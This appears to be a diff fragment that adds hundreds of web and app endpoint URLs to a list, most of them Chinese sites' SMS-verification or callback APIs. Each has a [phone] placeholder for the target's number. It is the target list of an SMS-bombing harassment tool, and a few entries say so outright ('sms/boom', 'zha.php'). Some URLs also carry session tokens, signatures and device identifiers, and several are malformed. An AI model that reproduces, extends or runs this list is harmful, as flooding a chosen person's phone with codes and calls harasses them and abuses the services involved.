+ "http://www.zkzcfu.cn/api/sms/send?mobile=[phone]&event=register", + "https://ubas.360jie.com.cn/ubas/event/report?flowNo=49181563973602947&bizCode=REGISTER_LOGIN&eventCode=SEND_SMSCODE&pageName=login.html&ABTest=A&TuanABTest=A&userOprTime=1563973631831&hostApp=APP&sourceType=APK&channelSource=CH_001_IOS&subChannel=&activityInfo=&utm", + "https://ucenter.1haitao.com/vc/mobile/SMSCode.htm?codeType=login&mobile=[phone]&sign=ea7f6860aa40d220409b892397890184", + "http://www.kaidikeji.com/registerPhoneYzmEx?phone=[phone]", + "http://www.songhebao.com/serv/api/member/GetSMSCode.ashx?phone=[phone][phone]&lx=1", + "http://i.im.etiantian.net/app-common-service/getPhoneValidateCodeForAixue.do?time=1563804384352&appId=561&typeId=1&uType=6&phoneNum=[phone]&sign=MjhhOTc4YzQ3YjBhZmFhZmRmZDkzY2ViMzRmZmM3ZjA", + "http://m.10010.com/mall-mobile/CheckMessage/captcha?phoneVal=[phone]&type=6", + "https://new.yohoboys.com/yohonow/api/register/registerSms?appType=2&app_version=5.9.4&area=86&client_secret=1296d0321e51188e17e698e128961947&client_type=iphone&curVersion=5.9.4°rees=%5B%5D&fromPage=iFP_Nlogin&language=zh-Hans&mobile=[phone]", + "http://114.55.104.205/api/auth/send?mobile=&access_token=[phone]", + "http://www.023jz.com/register/sendMobileCode.html?mobile=[phone]", + "http://iu.snssdk.com/user/mobile/send_code/?iid=80794405933&type=1&mobile=[phone]&ac=WIFI&channel=App Store&app_name=joke_zone&aid=27&version_code=2.2.0&device_platform=iphone&os_version=12.4&device_type=iPhone8,1&device_id=68923678300&vid=FFAA4EA8-1E5C-4EA0-9A1E", + "http://www.yigongkeji.cc/mobile/weixiu/view/member/getSmsCode?mobile=[phone]", + "http://www.zjsgat.gov.cn:8080/was/portals/cxfw/checkusermobile.jsp?mobilephone=[phone]", + "https://user.daojia.com/mobile/getcode?mobile=[phone]&newVersion=1&bu=112", + "http://m.yst.com.cn/pc/code/phone/regist?phone=[phone]", + "http: //www.flyertea.com/plugin.php?id=dzapp_mobile&mod=ajax&ac=code&type=reg&inajax=1&formhash=e55ad49c&mobile=[phone]", + "http://www.eshiptrading.com.cn/api/SMSSafeCode?mobile=[phone]", + "http://mkxq.zymk.cn/user/v1/mobilevc/?callback=jQuery321016123103253181426_1503210785449&mobile=[phone]&service=mkn&_=1503210785451", + "http://m.anjuke.com/general/sendphonecode?phone=[phone]&captcha=", + "http://m.10010.com/mall-mobile/CheckMessage/captcha?phoneVal=[phone]&type=7", + "http://api.qingmang.me/v1/account.sendVerification?code=1566478386.8872059778&phone=+86[phone]&token=YzllOTI2NGEtYzRkYi0xMWU5LTgxY2ItMDAxNjNlMDM2OTg5&platform=life_ios&udid=966d9749eb41b1f81489cabc0bc05c35a1f97032&v=2.6.12&vc=6", + "https://www.sogou.com/websearch/phoneAddress.jsp?phoneNumber=[phone]", + "http://www.dangaoss.com/h5/acc/send_code?_t=1552475308&sign=424064b2d2d003d83db05380438824cb&username=[phone]", + "http://dxhz.xqapi.live/api.php?id=[phone]", + "http://api.bangtuike.com.cn/api/v1/account/captcha?phone=[phone]&country=%2B86", + "https://apis.hyguanjia.com/user/send/phone/code?clientid=1254299999&mid=1E0D9617-438F-4A0D-BED0-AEB20FF19A50&phone=[phone]&sign=jBvhDrZ6SlcNzwkCx6SIhwkLtCZZ1GCCjvPj%24%24QD8balMbMtSRigOLwJkGjU%40%40PIsjj1rTgAEWBZDHlnw3%40%40Yrg9qGdwvb5Qv4euoCCHNExqXAGhb", + "http://www.patfun.com/do.php?ac=check_sms&phone=[phone]", + "https://iosapi.shixiseng.com/app/telrandcode?sign=6F4C6784400B289D3B0BC2742D704E59&tel=[phone]&time=1564926500.453583&type=reg", + "http://m.bidcenter.com.cn/JsonHandler/QuickRegisterValidateCode.aspx?mobiles=[phone]", + "http://114.55.104.205/api/auth/send?mobile=[phone]&access_token=[phone]", + "http://api.mianmianyue.com/basis/sendCheckCode?mobile=[phone]&checkSign=Gec1LPgwdA4OOyqQLAS5UkZnmck2eRyJxJP6rvTU7K8%253D", + "http://case.100.com/captcha?source=57&mobile=[phone]&resend=0&mkey=customer", + "https://login.51job.com/ajax/sendphonecode.php?jsoncallback=jQuery183018066339418540722_1589810779142&phone=[phone]&nation=CN&type=13&from_domain=i&verifycode=&_=1589810786512", + "https://idecoration.ikongjian.com/user/fetchCode?&deviceId=7676F5C4-1919-4FC8-9436-BBFD5BE87482&mobile=[phone]&type=1&token=YzVkMGVlYWMtZTU4My00MTc2LWJkMzYtZGZlMWRjODgwYjBkZDBiMDg4Y2QxZWZkLTYzZGItNjcxNC0zODVlLWNhZWUwZDVj", + "http://app.ftutj.cn/web/api.php?s=/Join/verify/?0.24206258677631287&picCode=[phone]", + "https://m.lubsj.com/index.php?app=member&act=send_captcha&phone_mob=[phone]", + "https://m.health.pingan.com/mapi/smsCode.json?deviceId=5a4c935cbb6ff6ca&deviceType=SM-G9300&timestamp=1545122608&app=0&platform=3&app_key=PAHealth&osversion=23&info=&version=1.0.1&resolution=1440x2560&screenSize=22&netType=1&channel=m_h5&phone=[phone]", + "http://juniorapi.gzxiangqi.cn/juniorAccounts/v2/getCode/3/[phone]", + "https://hdgateway.zto.com/auth_account_sendLoginOrRegisterSmsVerifyCode?mobile=[phone]", + "http://w4.duoyi.com/p_user/DoNewActCards.aspx?gate=sw&jsoncallback=jQuery18303232165043277003_1483854401800&act=getsmscode&phone=[phone]", + "https://www.qinglianyun.com/Home/User/sendCode?telephone=[phone]", + "https://dakaapp.troila.com/api/v7/index/send_sms?phone=[phone]&expect=0", + "https://m.ke.qq.com/cgi-bin/tool/apply_sms_code?is_ios=0&raw_phone=[phone]&phone=[phone]&national_code=86&from=1&bkn=1557826707&_=1596758267792", + "http://m.fanli.com/invite/sendverifycode?jsoncallback=jsonp2&pos=601&t=1488608297799&mobile=[phone]", + "https://mp.elong.com/mobilepromotion/common/sendactivitysmscodemtools?activityId=9880be64-a7c2-476e-9879-2fe371910f45&mobile=[phone]", + "http://dx.zy40.cn/dx/index.php?hm=[phone]", + "http://puser.funshion.com/user/sendappsmscodenocaptcha?app=main&app_code=iphone&cl=iphone&content=%E6%82%A8%E7%9A%84%E7%9F%AD%E4%BF%A1%E9%AA%8C%E8%AF%81%E7%A0%81%E6%98%AF%3A%25verifycode%25%E3%80%82%E6%82%A8%E7%9A%84%E6%89%8B%E6%9C%BA%E5%8F%B7%E6%AD%A3%E5%9C%A8%E4%", + "http://m.10010.com/mall-mobile/CheckMessage/captcha?phoneVal=[phone]&type=3", + "https://user.meilimei.com/taomi/user/sendSmsCaptcha?mobile=[phone]", + "http://kyddn.log56.com/sq_server/verifyCode.action?mobile_no=[phone]", + "http://imfreecall.3158.cn/index.php/call?CB=WebFreeCall.callResult&C=60098&T=[phone]", + "http://www.henhuoapp.com/api/method/getCode?phone=[phone]&type=1", + "http://ptlogin.4399.com/ptlogin/sendPhoneLoginCode.do?phone=[phone]&appId=www_home&v=2&sig=&t=1592615855903&v=2", + "http://www.100ppi.com/ecp/ppi/get_sf/get_yzm.php?m=[phone]", + "http://api.bangtuike.com.cn/api/v1/account/captcha?phone=[phone]&country=%2B86", + "http://www.wjask.com/wj/req_phone_code&tem=register Mobile=[phone]", + "http://b2c.csair.com/portal/smsMessage/EUserVerifyCode?mobile=[phone]", + "http://api.wangxiao.cn/app/user.ashx?mobile=[phone]", + "http://www.nswtt.org.cn/commonSms/send.do?mobile= [phone]", + "http://www.udache.com/app/mQuickReg/getSmsCode?phone=[phone]", + "http://www.fvv678.cn/app/user/checkMobileReg?mobile=[phone]&token=0&timestamp=1558355544&sign=c906bc234a2b4ac71ed23cae0147092b", + "https://app.zhuanzhuan.com/zz/transfer/getCaptcha?type=1&mobile=[phone]", + "https://app.api.ke.com/user/account/sendverifycodeforbindmobilev2?mobile_phone_no=[phone]", + "http://www.shdsyy.com.cn/web/index.php?classid=9191&action=call&phone=[phone]", + "http://api.wangxiao.cn/app/user.ashx?mobile=[phone]&t=mobilelogincode", + "http://activity.renren.com/livecell/ajax/tryVerify?sanbox=a&phoneNum=[phone]", + "http://211.156.201.12:8088/youzheng//ems/security?phone=[phone]", + "http://www.qdnks.com/default/user/getvlcode &purpose=register act=get_verify&user_name=[phone]", + "http://www.e8088.com/index/product/try!phoneVerifyCode.action?tipMessage=[phone]", + "http://newweb.lumiai.com/api/isecurity/sms_captcha?mobile=[phone]", + "http://www.jiedai315.com/SendCode.ashx?Mobile=[phone]&Identifier=6", + "https://bea.sportq.com/SFitWeb/sfit/getNeceData?form.accessToken=&form.acquisitionMode=5&form.device=2e18c9d9f73c9c9f619fce23cf4039eb2748c334cb8d43c31521caee0ad92c4c&form.isBuild=0&form.mySex=&form.phoneModel=iPhone8%2C1&form.phoneNumber=[phone]&form.phoneType=1&fo", + "http://srmemberapp.srgow.com/sys/captcha/[phone]", + "http://m.tk.cn/tkmobile/service/member?function_code=dynamicLogin&login_mobile=[phone]", + "http://dgapi.zczgcn.com/shopSupport?Mobile=[phone]&BusinessId=15886&systemType=android&appVersion=4.1.01&postTime=2019-07-19+00:19:14&timeStamp=1563466754286&method=ShopSupport.GetGuiderLoginVerifyCode&format=json&user=u1city&token=a0ea92fa90904b64becaa5b2bb0b8", + "http://m.10010.com/mall-mobile/CheckMessage/captcha?phoneVal=[phone]&type=17", + "http://www.weloan.com/front/account/verifyMobile?mobile=[phone]", + "https://mobile.cmbchina.com/DUserManage/UserRegisterNew/URN_Register.aspx?phoneNo=[phone]", + "https://oa.dingtalk.com/omp/sms/send_check_code_img&vcode=uaiIIuNYyv&ajax=1&r=0.37962152601011057step=getverifycode&u_nme=undefined&mobi=[phone]", + "http://e.huijimall.com/api/store/rest/v2/zhutest/request_login_smscode?mobile=[phone]", + "https://login.10086.cn/chkNumberAction.action?userName=[phone]", + "https://m.health.pingan.com:443/mapi/smsCode.json?deviceId=5a4c935cbb6ff6ca&deviceType=SM-G9300&timestamp=1545122608&app=0&platform=3&app_key=PAHealth&osversion=23&info=&version=1.0.1&resolution=1440x2560&screenSize=22&netType=1&channel=m_h5&phone=[phone]", + "https://api.sharkshopping.com/ec/api?method=b2c.member2.related_sms&uname=[phone]", + "http://forum.xitek.com/forum.php?mod=ajax&infloat=register&handlekey=register&action=vcode&inajax=1&fp=4155208328&check=80e5&mobile= [phone]", + "https://api.taoelement.vip/account/sms/sms/captcha/[phone]/mineTker", + "http://bizapi.pezy.cn/qknode/sms/reqSmsCode?publishid=1003&deviceId=2808ec7ef7fbeed6&df=android&vt=5&screen=1080x1920&deviceid=2808ec7ef7fbeed6&proid=qknode&os=android&av=NMF26X&appVersion=1.4.0&imei=&ov=7.1.1&osVersion=7.1.1&osLevel=25&phone=[phone]&token=", + "https://id.ifeng.com/api/simplesendmsg?comefrom=38&msgtype=0&auth=&mobile=[phone]", + "https://appapi-h5.yongche.com/Common/CreateAuthCode?cellphone=[phone]", + "http://api.wangxiao.cn:80/app/user.ashx?mobile=[phone]", + "http://passport.centanet.com/m/page/ajax/20C79442F06E.ashx?Act=SetCode+phone=[phone]", + "https://app.api.lianjia.com/user/account/sendVerifyCodeForRegisterV2?mobile_phone_no=[phone]&request_ts=1564114069", + "http://appsever.caissa.com.cn/api/token/user/verifyAndgetCaptcha?data=%7B%22phone%22%3A%22[phone]%22%2C%22type%22%3A%223%22%2C%22userId%22%3A%22%22%7D&head=%7B%22account%22%3A%22android01%22%2C%22channel%22%3A%22C0001%22%2C%22channelSecond%22%3A%22CS0001%22%2C%22pa", + "http://zaiwai.8848.com/commonService/sendNewVerificationCodeToPhone?phone=[phone]", + "http://www.6dspeaker.com/sdspeaker/public?method=getPhoneCode&phone=[phone]&countryCode=%2B86&validateType=1", + "https://pass.hujiang.com/Handler/UCenter.json?action=SendMsg&business_domain=yyy_cichang&captchaVersion=2&hpuid=753-hG5lbwKtYM04Ldr-19&imgcode=&isapp=true&mobile=+86-[phone]&msgtype=1&sendtype=mobilemsgpwd&token=4eee9083e9d146799ef5828ac583d8b3&user_domain=hj", + "http://www.jsvideo.tv/sendMsg&type=1 mobile=[phone]", + "http://passport.chinahr.com/ajax/m/sendCode/[phone]?tmpid=1957&from=2&imgCode=", + "http://api.v2.msparis.com/common/mobile?channel=App Store-vest&clientId=msparis-ios-4.2.4-vest&mobile=[phone]&platform=ios-vest&rent_mode=2", + "https://gateway-api.kuainiujinke.com/etrack/record?date=2019-09-02&refer=https://www.daishangqian.com/m/#/user/login&source=dsq&timestamp=1567390955843&traceId=A15C586B-6CFF-47C7-81FF-3ACFFB39D046&uid=&url=https://www.daishangqian.com/m/%2", + "http://118.178.230.82:8081/front/smsLogin.do?sign=2688a8ff469c6a19aeff8c70cfd5444e&platformCode=HUIYING&stime=1483258437244&token=35228404066186&smsType=LOGIN_VERIFY&cell=[phone]", + "https://api.passport.pptv.com/snsms/sendcode?_source=ppsports&apptype=android&appversion=1.0.7.1&deviceId=7433976558071546231901338_vx768bn3ieimjk1n3g5opc7w&terminal=APP&phoneNumber=[phone]&channel=208000202030&format=json&", + "http://www.jiedianqian.com/api/account/send_verify_code.do?mobile=[phone]", + "http://ccyagu.gswanzhong.com/Apicloud/User/sendCaptcha?Mobile=[phone]", + "https://pass.cctalk.com/intraApi/v1/sms/send?action=SendMsg&mobile=%2B86-[phone]&imgcode=&token=aa315477956d459f40b6f26c9090b790&sendtype=mobilemsgpwd&msgtype=1&captchaVersion=2&user_domain=cc&business_domain=&hpuid=924-ECmHmDZ0xdhMnXe-43&callback=reqwest_1589532775907030687", + "http://www.iliangcang.com/i/mob_login?act=getCode&mobile=[phone]", + "https://exmail.qq.com/cgi-bin/bizmail_portal?action=send_sms&type=11&t=biz_rf_portal_mgr&ef=jsnew&resp_charset=UTF8&area=86&mobile=[phone]", + "http://user.memeyule.com/authcode/send_mobile?china=true&mobile=[phone]", + "https://host.convertlab.com/sms/token?mobile=[phone]", + "http://passport.fanli.com/login/ajaxLoginSendVerfiycode?jsoncallback=jQuery183044493322381181954_1486714320243&pos=601&mobile=[phone]&_=1486714329485", + "http://passport.12371.cn/security/getMobileCode?type=regist&mobile=[phone]", + "https://pass.hujiang.com/v2/Handler/UCenter?action=SendMsg&imgcode=&token=1e7bbab658a5b65cbc3074d6296a0b9b&sendtype=register&msgtype=1&captchaVersion=2&user_domain=hj&business_domain=&hpuid=P0S4wETf4noqmS29L5650&callback=reqwest_1546707722757024049&mobile=%2B86-[ph", + "http://m.cibyun.com/User/SendRegistCCP?MemberUserId=-1&SellerUserId=null&X-Requested-By=m.cibyun.com&X-Requested-Data=qmjpyeprwskgcihxbbx&phone=[phone]", + "http://ccyagu.gswanzhong.com:80/Apicloud/User/sendCaptcha?Mobile=[phone]", + "http://api.hanju.koudaibaobao.com/api/user/verifyMobile?country=+86&mobile=[phone]", + "http://i.zhaopin.com/Login/LoginApi/SendBindSms?jsoncallback=jQuery16402676061029242586_1454143948438&businessType=C-Bind&t=1454143948656&_=1454143948656&mobile=[phone]", + "http://www.mzsky.cc/plugin.php?id=smstong:verifycode&idhash=SJw54jL0&formhash=82e4ff11&seccodeverify=&inajax=yes&infloat=register&handlekey=register&ajaxmenu=1&action=getregverifycode&mobile=[phone]&0.7010368446838822", + "http://i.xfvw.cn/api/sms/send?mobile=[phone]", + "http://www.jiqinging.com/ajax.php?do=getCheckCode&tel=[phone]", + "http://ptlogin.4399.com/ptlogin/sendRegPhoneCode.do?phone=[phone]", + "http://www.sbsq.aliwe.com/index.php?s=/api/mobile_verify_code_get_request/index2&mobile=[phone]&type=register&sign=999eb3cf7e7998d07b78e21884433f74", + "https://nhapi01.tv189.com/cpms/Internet?appid=111010310081&phone=[phone]&idfa=5C351103-F887-4932-BC59-58C75875EFDE&NetType=WIFI&channelID=01834221&type=register&iosid=ccb2ffcb0bc0a5b42678ac61fed3372bed1ce69a&devid=000001&pcode=4&accessType=99&clienttype=5&token=417", + "https://mp.66law.cn/Common/GetValidateCode?time=1574424867777mobilePhone=[phone]", + "http://codingle.cn/api/user/register/tel_verify?tel=[phone]", + "http://api.hanju.koudaibaobao.com/api/user/verifyMobile?_ts=1564136775711&country=%2B86&mobile=[phone]", + "http://demo.q20x.xyz/sms.php?phone=[phone]", + "http://api.hsj.huanci.net/index.php/api/user/isPhoneRegister?appVer=1.1.0&cur_user_id=-1&device=iPhone6S&device_brand=Apple&device_model=iPhone&os_version=12.4&phone=[phone]", + "http://mobile.health.pingan.com/ehis-hl/ajax/sendOTP.action?smscc=ehiswxonly&phone=[phone]", + "https://esx.3z.cc/index.php?tp=api/send_sms&device_type=iPhone%206s&uid=0&op=reg&appid=6&imei=5C351103-F887-4932-BC59-58C75875EFDE&t=1566798214&pt=2&sign=8737393a0d7dffc46883c5226d482194&ver=1.2.1&phone=[phone]", + "https://api.pkg.cn/api/sms/codeaccNbr=[phone]", + "http://web.enjoysms.cn/do/safecode.do?0.4155260914653185&VerifyCode=[phone]", + "http://mkxq.zymk.cn/user/v1/mobilevc/?callback=jQuery321016123103253181426_1503210785449&mobile=[phone]&service=mkn&_=1503210785451 ", + "http://imfreecall.3158.cn/index.php/call?CB=WebFreeCall.callResult&C=60098&T=[phone]", + "https://user.daojia.com/mobile/getcode?mobile=[phone]&newVersion=1&bu=112", + "https://m.wanghairead.com/api/5b9e03e333e5e?phone=[phone]&send_type=1", + "http://www.daquant.com/Member/Index/sendcodes?mobile=[phone]", + "http://13668291681.ftxmall.net/sms/send?mobile=[phone]", + "https://www.shencut.com/api/v1.0/code?operate_type=register&mobile=[phone]", + "http://www.zsbox.net/api/call/index?user_id=244127&auth_key=c602e6ebb2311895b922d5bef854dc87&type=c&proxy_id=148455&phones=[phone]", + "https://www.baixing.com/oz/verify/reg?mobile=[phone]&businessType=register_captcha_code", + "https://www.gac-toyota.com.cn/sublayouts/Member%20Center/VerifyCode.aspx?random=0.6042665278484218&ws_Method=getDynamicCodeTEL_NO=[phone]", "http://jnggzy.jinan.gov.cn/jnggzyztb/regist_gys/putPhone.do?aa=Math.random()&phone=[phone]", - "http://m.logofree.cn/misc.php?act=send_sms&m=[phone]&token=f3c95f20b6628ae17a40111ebf4170e8" + "http://www.pumg.com.cn/phone.do?USERTEL=&token=bZnQLILMeWM8EF57AsIxdhwWOYyUAzSdLGLdb%2FIcj5TxIUMmRFcqAQ%3D%3D&type=0&flag=0×tamp=1548589939708telphone=[phone]", + "http://www.humengyun.com/index.php?a=login&m=sendSMS&mobile=[phone]&_=1480986460007", + "http://vipapp.yunjiweidian.com/yunjiapp4buyer/app4buyer/generateSmsCode.json?phone=[phone]", + "https://api.julym.com/hz/api.html?number=[phone]", + "https://ptlogin.4399.com:443/ptlogin/sendPhoneLoginCode.do?phone=[phone]", + "https://user.hundun.cn/get_identify_code?clientType=pcweb&versionName=&imei=&net=&phone=[phone]", + "http://wx01.lecake.com/customer/get-code.html?mobile=[phone]&yzm=148323267", + "https://ptlogin.4399.com/ptlogin/sendPhoneLoginCode.do?phone=[phone]", + "https://api.1sapp.com/captcha/getSmsCaptcha?GUID=9b079137577015d58e0428cbae5.61417812&OSVersion=12.4&active_method=icon&deviceCode=5C351103-F887-4932-BC59-58C75875EFDE&distinct_id=&dtu=100&lat=29.58959433282935&lon=106.281065329089&network=WIFI&sign=73ffc97fcc0d33c", + "http://m.jiguo.com/mb/api/validatecode/color/mb.html?d=0.7554753933168952&vcode=tel=[phone]", + "http://api.hanju.koudaibaobao.com/api/user/verifyMobile?country=%2B86&mobile=[phone]", + "https://m.exmail.qq.com/cgi-bin/sell_dependent?action=send_sms&t=wap_official_mgr&ef=jsnew&type=6&area=86&mobile=[phone]&r=0.6184749692742786", + "http://api2.cloudlinks.cn:80/Users/PhoneCheckCode.ashx?CountryCode=86&AppVersion=6357251&PhoneNO=[phone]", + "https://pass.hujiang.com/Handler/UCenter.json?action=SendMsg&business_domain=yyy_cichang&captchaVersion=2&hpuid=753-hG5lbwKtYM04Ldr-19&imgcode=&isapp=true&mobile=%2B86-[phone]", + "https://www.guiji.ai/site/sms?type=2&mobile=[phone]", + "http://center.siyi.cn/process.aspx?c=sendvcode&vt=sms&va=reg&mobile=[phone]", + "http://www.xuebangsoft.net/eduboss/CommonAction/sendVarifyCodeToPhone.do?phoneNumber=[phone]®TimeCode=1589627585503", + "http://m.1mi.cn/wap/user/mobile_verify.json?mobile=[phone]&flag=0&identifying=", + "http://wx.fowep.com/iwater/v1/usercenter/nt/sendAuthCode/v2.json?requestPara=%7B%22mobile%22:%22[phone]%22,%22type%22:1,%22token%22:null,%22waterCorpId%22:3,%22UNID%22:%22%22,%22areaId%22:0,%22accountType%22:%22XJ%22,%22apiType%22:%22PC%22,%22appVersion%22:%221.0.2%22%7D", + "http://www.gangaimall.com/mbb-web/api/account/code?mobile=[phone]&type=0", + "http://www.baixing.com:80/m/oz/verify/reg?mobile=[phone]", + "https://dakaapp.troila.com/api/v7/index/send_sms?phone=[phone]", + "http://puser.funshion.com/user/sendappsmscodenocaptcha?app=main&app_code=iphone&cl=iphone&content=\u60a8\u7684\u77ed\u4fe1\u9a8c\u8bc1\u7801\u662f:%verifycode%\u3002\u60a8\u7684\u624b\u673a\u53f7\u6b63\u5728?%", + "http://www.patfun.com/do.php?ac=check_sms&phone=[phone]", + "http://wx.bda.com/ajax/ajax_login.php?action=[phone]", + "http://yangba.syoogame.com/ajax/sendMobileVerifyCode?mobile=[phone]", + "http://dafeiyu.cn/sms/boom?mobile=[phone]&config=1&num=2", + "https://pass.cctalk.com/intraApi/v1/sms/send?action=SendMsg&business_domain=yyy_cctalk&captchaVersion=2&hpuid=785-0bCp21yf6XXmRiz-40&imgcode=&isapp=true&mobile=%2B86-[phone]&msgtype=1&sendtype=mobilemsgpwd&token=3cab2a2b042928518869ab9fee57ce03&user_domain=cc", + "http://mall.yyfq.com/installment/fws/user/sendMobileCode?mobile=[phone]", + "http://api.xingchentd.com/logic-user/user:users/mobile/?mobile=[phone]&projection=withRoles", + "http://www.tell520.com:80/ajax/do.html?action=sendSms&type=reg&YII_CSRF_TOKEN&phone=[phone]=a70ca68498d9489dbe88e141ba49751267896313", + "http://mobile.yougou.com/v_1.8/quicklyLoginMobileverify?username=[phone]", + "http://zntouzi.com/front/account/verifyMobileForReg?randomID=d2b07acd-917c-4d81-a849-9c694f25833b&code=111111&mobile=[phone]", + "http://spi.lakala.com/wechat/weixin/signUp/getSMSCode.do?Mobile=[phone]", + "http://wx.airjiangxi.com/html5_jx/main?sourceid=&apptype=&appcode=&developer=&channel=&usertype=&userid=&actionCode=18&type=0&cotentType=1&mobileORemail=[phone]&ffpid=&pidNumber=", + "https://soufunapp.3g.fang.com/http/sfservice.jsp?messagename=appSendMobileCode&mobilephone=[phone]&operatetype=0&sendvoice=0&wirelesscode=2C56469F49A8526BC922ECFA14C22AC7", + "https://login.koolearn.com/sso/sendVoiceRegisterMessage.do?callback=jQuery111205661385064312077_1594952633553&type=jsonp&mobile=[phone]&msgInterval=60&imageCode=&countryCode=86&country=CN&_=1594952633566", + "https://login.10086.cn/sendRandomCodeAction.action?userName=[phone]&type=01&channelID=12002", + "http://m.tk.cn/tkmobile/orderSentSmsServlet?mobile=[phone]", + "https://user.qunar.com/webApi/logincode.jsp?mobile=[phone]&vcode=&origin=wechat$$&action=register&type=implicit", + "http://www.weimaiyy.com/register/sms?t=0.6886729517940704&phone=[phone]", + "http://m.yuhuijob.com/skins/save_check.php?f=regyzm&uname=[phone]", + "http://m.10010.com/mall-mobile/CheckMessage/captcha?phoneVal=[phone]&type=11", + "http://www.aipai.com/app/www/apps/ums.php?step=ums&mobile=[phone]&callback=jQuery17209171715653229815_1599374652809&_=1599374671117", + "http://api2.cloudlinks.cn:80/Users/PhoneCheckCode.ashx?CountryCode=86&AppVersion=6357251&PhoneNO=[phone]", + "https://m.jf.10010.com/wx006/jf-auth/wx/getCaptcha/[phone]", + "https://m.mgqr.com:443/ajax/getcode.ashx?check=0&t=1586567002298&phone=[phone]", + "http://api.qingmang.me/v1/account.sendVerification?platform=console&token=&phone=%2B86[phone]&code=10164337", + "http://jx.kuwo.cn/KuwoLivePhone/user/sendSMS?mobile=[phone]", + "https://webapi.account.mihoyo.com/Api/create_mobile_captcha?action_ticket=&action_type=regist&mobile=[phone]", + "http://api.sssc.cn/seccode/reg?callback=&m=[phone]", + "https://passport.haochedai.com/UserForDeayou/phoneCode?callbackparam=jsonpReturn&phone=[phone]", + "http://m.10010.com/mall-mobile/CheckMessage/captcha?phoneVal=[phone]&type=15", + "http://www.wehealthchina.net/api/v0.1/vcode?app=doctor&client=android&action=register&phone=[phone]", + "https://qxin.info/oldfile/zha.php?NUMBER=[phone]&c=1&ok=", + "http://www.900index.com/api.php?a=sendsms&m=index&mobile=http://wjy138.haodai26.cn/sms.php?tel=[phone]", + "http://flights.sichuanair.com/3uair/ibe/profile/processSendSMSNew.do?ConversationID=&smsType=REGISTER&mobilePhone=[phone]&verkey=MOBILELOGIN", + "http://api2.cloudlinks.cn:80/Users/PhoneCheckCode.ashx?CountryCode=86&PhoneNO=[phone]&AppVersion=6357251", + "https://androidapi4.yc.ifeng.com:443/api/fread/user/msgAuthCode?phoneNum=[phone]&v=5.5.32.83027", + "http://open.leju.com/game/member/sendcode.html?phone=[phone]", + "https://prod.huohuaschool.com/api-website/user/sms?phone=[phone]&type=6", + "https://sso.scrcu.com/ebuisso/SendSMSVerificationCode?userId=0000&authType=03&mobile=[phone]&_=1480945303044", + "http://ttq.api.yolanda.hk/api/v5/users/identifying_code.json?address=&app_id=TTQ&app_revision=2.2.2&cellphone_type=iPhone6s-12.4&login=[phone]", + "http://www.yundaipay.com/index/user/getMsgCode?username=[phone]", + "http://www.rrjc.com/sendVoiceCodeByType.do?username=[phone]", + "https://passport.xueweigui.com/mobile/sendCode?mobile=[phone]", + "http://home.ecook.cn/user/code?phone=[phone]", + "https://live.weaver.com.cn/homepage/createCode2?jsonpcallback=jQuery11020786823554715125_1594648708687&phonenum=[phone]", + "http://m.tk.cn:80/tkmobile/orderSentSmsServlet?mobile=[phone]", + "https://appapi.che168.com/phone/v55/user/CreateRegLoginMobileCode.ashx?_appid=2scapp.ios&_sign=bd185e04d8bdb0422467b0f95f828b49&appversion=7.7.0&channelid=App%20Store&ip=192.168.43.151&mobile=[phone]", + "https://uc.maodou.com/server/account/sendLoginCode?phone=[phone]", + "http://www.nongyisheng.com/sms/code?fr=pc&token=false&phone=[phone]", + "http://www.xjwvxz.com/api/call/index?user_id=244127&auth_key=c602e6ebb2311895b922d5bef854dc87&type=c&proxy_id=148455&phones=[phone]", + "http://www.baixing.com/m/oz/verify/?fromS9=1&identity=[phone]&mobile=[phone]", + "https://www.4008123123.com/phhs_ios/isNotExistUser.action?r=0.9460999953115119?phone=[phone]", + "http://passport.fanli.com/mobileapi/i/user/mobileFastReg?deviceno=860903034476055&mobile=[phone]", + "https://mc.imways.com/wechat/member/info/sendmsg?mobile=[phone]", + "http://ttq.api.yolanda.hk/api/v5/users/identifying_code.json?address=&app_id=TTQ&app_revision=2.2.2&cellphone_type=iPhone%206s-12.4&login=[phone]&mob_type=1&platform=iphone&send_type=1&systemLaunguage=zh-Hans-CN", + "http://user.memeyule.com/authcode/send_mobile?china=true&mobile=[phone]", + "http://www.super8.com.cn/Ajax/HotelInterface.ashx?action=sendmsg&mobile=[phone]", + "https://m.yiwise.com/apiPlatform/verificationCode/send?phoneNumber=[phone]", + "http://bj1.xiangcloud.com.cn/customer/sms/?phone=[phone] &accessType=1&circleId=100000055", + "https://suyun-guest.daojia.com/api/guest/antcheat?aLiDeviceToken=&app_idfa_real=5C351103-F887-4932-BC59-58C75875EFDE&app_source=2&app_uuid=BC445415-3280-46CD-8EF2-87936A0D762F&channel-id=Appstore&cityid=37&common_lat=29.5870231&common_lng=106.2847588&imei=F3F6BCC9-", + "http://center.siyi.cn/process.aspx?c=sendvcode&vt=sms&va=reg&mobile=[phone]", + "https://uac.10010.com/portal/Service/SendMSG?callback=jQuery172076565523879526_1506486642542&req_time=1506486656403&mobile=[phone]", + "https://gwbk.zhongan.com/dmapiv2/za-dm-insure/dm/user/sendSMGCode?mobilePhone=[phone]&from=web", + "http://www.shoujibao.uni-info.com.cn/send_register_verify.action?register_customer_name=[phone]", + "https://api.xinmaotong.cn/flw-auth/code?phone=[phone]&type=0", + "http://m.10010.com/mall-mobile/CheckMessage/captcha?phoneVal=[phone]&type=3", + "http://passport.1yyg.com/JPData?action=send2Msg&userMobile=[phone]", + "http://app.yimian.red/service/hs/login/sms?telphone=[phone]&type=0&time=1563875962595&sign=f714baa6f3788e90bf483d6b2e22a133", + "http://api.beequick.cn/logging/beforeVerifySMS?msisdn=[phone]", + "https://new.yohoboys.com/yohonow/api/register/registerSms?appType=2&app_version=5.9.4&area=86&client_secret=1296d0321e51188e17e698e128961947&client_type=iphone&curVersion=5.9.4°rees=[]&fromPage=iFP_Nlogin&language=zh-Hans&mobile=[phone]", + "https://www.limi88.com/get_request_sms_times?phone=[phone]", + "http://m.renwo.com/Ajax/json.ashx?at=sendregsmsvcode&m=1&mobile=[phone]", + "http://passport.fang.com/loginsendmsm.api?callback=jsonp1475917947590&Service=home-club-web&backurl=&mobilephone=[phone]", + "http://www.appbesafe.com/htourist/sendPhoneMessageZc?phone=[phone]&type=1", + "http://m.xymens.com/index.php/Home/User/send_code?mobile=[phone]", + "http://srmemberapp.srgow.com/sys/captcha/://gj.liansuosoft.com/ShopRegister/SendSms?mobile=[phone]", + "http://flights.sichuanair.com/3uair/ibe/profile/processSendSMSNew.do?ConversationID=&smsType=REGISTER&mobilePhone=[phone]", + "http://m.10010.com/mall-mobile/CheckMessage/captcha?phoneVal=[phone]&type=25", 